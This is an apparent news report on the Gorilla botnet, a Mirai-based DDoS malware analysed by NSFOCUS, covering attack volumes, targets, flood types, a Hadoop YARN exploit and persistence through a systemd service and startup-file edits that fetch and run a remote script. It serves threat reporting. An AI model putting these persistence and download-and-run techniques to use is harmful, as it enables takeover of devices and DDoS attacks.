Researchers studying cybersecurity have uncovered a new type of botnet malware known as Gorilla (also known as GorillaBot), which takes its cues from the publicly available source code for the Mirai botnet.
According to the cybersecurity company NSFOCUS, which discovered the activities last month, between September 4 and September 27, 2024, the botnet “issued over 300,000 attack commands, with a shocking attack density”. Every day on average, the botnet has issued no fewer than 20,000 orders intended to mount distributed denial-of-service (DDoS) attacks.
According to reports, the botnet attacked colleges, government websites, telecoms, banks, the gaming and gambling industries, and more than 100 countries. The most often attacked nations are now China, the United States, Canada, and Germany.
The Beijing-based company stated that Gorilla’s main DDoS attack methods are UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood. It also added that because UDP is a connectionless protocol, arbitrary source IP spoofing can produce a lot of traffic.
Not only does the botnet support a variety of CPU architectures, including ARM, MIPS, x86_64, and x86, but it also has the ability to establish a connection with one of five pre-configured command-and-control (C2) servers in order to receive DDoS commands.
In an unusual twist, the virus also embeds functions to exploit a security hole in Apache Hadoop YARN RPC to accomplish remote code execution. It is noteworthy that, according to Alibaba Cloud and Trend Micro, the flaw has been exploited in the wild since 2021.
To accomplish persistence on the host, create a custom.service service file in the “/etc/systemd/system/” directory and set it up to launch automatically each time the system boots up.
The task assigned to the service is to download and run a shell script called “lol.sh” from a remote server called “pen.gorillafirewall[.]su”. The “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd” files now have comparable commands added to them, enabling the shell script to be downloaded and executed during system starting or user login.
“It introduced various DDoS attack methods and used encryption algorithms commonly employed by the Keksec group to hide key information, while employing multiple techniques to maintain long-term control over IoT devices and cloud hosts, demonstrating a high level of counter-detection awareness as an emerging botnet family,” NSFOCUS stated.